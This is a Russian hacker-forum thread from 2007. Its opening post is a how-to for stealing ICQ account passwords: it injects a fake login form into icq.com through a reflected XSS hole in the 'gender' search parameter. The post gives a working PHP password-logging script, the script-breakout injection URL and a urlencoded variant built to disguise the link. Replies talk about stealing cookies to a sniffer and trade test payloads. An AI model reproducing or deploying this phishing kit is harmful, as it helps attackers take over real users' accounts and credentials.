Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.11.2007, 18:26
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Заходим в Icq через Xss
Заходим в Icq через Xss
В этой статье я расскажу, как можно использовать уязвимость XSS на сайте ICQ.com.
Всем известно, что через фейк можно угнать icq, но далеко не все станут заходить по ссылке vasya.com/fake.php.
Возникает вопрос, можно ли сделать так, чтобы фейк был на ICQ.com? Ответ простой - да, и не сложно.
...Немного теории...
Нам понадобится:
1. Хост с поддержкой PHP (платный или бесплатный)
2. Уязвимость (XSS)
3. Два скрипта :1. Фейк
2. Сохранялка пароля (login.php) Уязвимость ICQ.com - файл icq.com/people/ уязвимое поле gender, вот урл:
http://icq.com/people/?people_search=1&searched=1&gender=[xss]
Фейк получился у меня очень большой и не поместился в сообщение, поэтому скачать =)
Сохранялка пароля (login.php) очень простая
PHP код:
<?
$file = 'icq.txt'; // файлик
if( $_GET['delete'] == 'ok' )
{
$f = fopen($file, 'w');
fwrite($f, NULL);
fclose($f);
echo('Файл '.$file.' очищен');
}
elseif( $_POST['uin_email'] && $_POST['password'] )
{
$f = fopen($file, 'a');
fwrite($f, $_POST['uin_email'].';'.$_POST['password']."\n");
fclose($f);
header('Location: http://icq.com');
}
else
{
header('Location: http://icq.com');
}
?>
$file можете изменить по своему желанию.
...От теории к практике...
Заливаем файл login.php на хост с поддержкой PHP.
Приётся немного подкорректировать фейк (script.js). Измените содержание переменной $fake (http://site/karma/login.php) на урл до login.php. Ну и собственно заливаем его туда же.
Теперь нам надо только составить урл уязвимости. Открываем http://icq.com/people/?people_search=1&searched=1&gender=[xss], но вместо [xss] напишем к примеру <xss_test>, теперь видим, что баг находится внутри скрипта:
Код:
<script type="text/javascript" language="Javascript">
document.getElementById('gender').selectedIndex = <xss_test>;
document.getElementById('fr_age_group').selectedIndex = 0;
</script>
Ну а теперь можно составить код, делающий фейк на этой странице, нам нужно, чтобы код выглядел так:
Код:
<script type="text/javascript" language="Javascript">
document.getElementById('gender').selectedIndex = 1;</script><script src="путь_до_фейка"></script><script>//;
document.getElementById('fr_age_group').selectedIn dex = 0;
</script>
Наш урл будет выглядеть так:
http://icq.com/people/?people_search=1&searched=1&gender=1;</script><script src="путь_до_фейка"></script><script>//
Не очень красиво, согласитесь? Есть множество програм/тулз, которые маскируют ссылку, я выбрал способ - с помощью urlencode (в PHP).
Кто не знает, где найти маскировщик, юзайте мой (вписываете этот ява скрипт код и Url будет маскировкой).
У нас получится урл типо этого:
http://icq.com/people/?people_search=1&searched=1&gender=%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f
Не супер секретная ссылка, но это, всё что можно сделать =)
Ах да, и ещё к сожалению, она не будет работать в осле, не знаю почему..
Теперь можете попробывать ввеси уин и пароль, и когда нажмёте submit, ваши данные сохранятся в файл, указанный в login.php (по умолчанию - icq.txt), а вы, как ни в чём не бывало, перейдёте на http://icq.com.
Вы так же можете очищать этот файл, зайдя на login.php?delete=ok.
P.S. Thx 2 inv за идею =)
P.P.S. Нет, я не увлёкся взломом ICQ, я просто решил поведать новичкам о том, как сделать фейк ICQ.com на самом же ICQ.com.
Последний раз редактировалось NOmeR1; 18.11.2007 в 18:43..
|
|
|
18.11.2007, 18:48
|
|
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141
Репутация:
291
|
|
возможно фейк будет дописан
просьба не кидаться колкими словечками в Nomer1=)
|
|
|
|
18.11.2007, 18:54
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
NoScript отфильтровал нежелательную XSS отаку =)
Спасиб, +
|
|
|
|
20.11.2007, 17:56
|
|
Познающий
Регистрация: 03.10.2007
Сообщений: 83
Провел на форуме:
213499
Репутация:
9
|
|
Что-то не работает у меня.
Должно появляться меню ввода что ли?
А куки можно стырить? =)
|
|
|
|
20.11.2007, 18:19
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022
Репутация:
259
|
|
Сообщение от Impuls*
Что-то не работает у меня.
Должно появляться меню ввода что ли?
А куки можно стырить? =)
Зачем куки, если тебе пасс приплывает сразу?))
|
|
|
|
20.11.2007, 19:00
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
ну это уже разжовано, а хсс можно было взять и в статье уязвимостей, так что зря как статью, пихнул бы сразу в пассивные хсс
|
|
|
|
20.11.2007, 19:08
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
ну на данный момент актуально, но ведь никто не знает сколько проживёт Xss =)
|
|
|
|
20.11.2007, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
Сообщение от Impuls*
Что-то не работает у меня.
Должно появляться меню ввода что ли?
А куки можно стырить? =)
по идею тебе должно прийти коокие файл на сниффер.
Кстати искомый алерт ни в опере ни в осле, что означает и не в фиреворксе не работает , вызывая в осле лишь ошибку =\ -) Кстати Номерьчег, а ты сам тестил?) и гиде файл-фейк? -)
|
|
|
|
20.11.2007, 19:23
|
|
Banned
Регистрация: 03.08.2007
Сообщений: 313
Провел на форуме:
951141
Репутация:
291
|
|
%31%3b%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%7 0%74%20%73%72%63%3d%22%ef%f3%f2%fc%5f%e4%ee%5f%f4% e5%e9%ea%e0%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73 %63%72%69%70%74%3e%2f%2f
Sn@k3
код страницы посмотри
потом поймешь над кем надо смеяться=)(я тоже сначала не вкурил)
|
|
|
|
20.11.2007, 19:25
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Сообщение от Sn@k3
по идею тебе должно прийти коокие файл на сниффер.
Кстати искомый алерт ни в опере ни в осле, что означает и не в фиреворксе не работает , вызывая в осле лишь ошибку =\ -) Кстати Номерьчег, а ты сам тестил?) и гиде файл-фейк? -)
По твоему посту я могу сказать, что ты не читал статью =)
http://icq.com/people/?people_search=1&searched=1&gender= 1;</script><script>alert("XSS")</script>
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
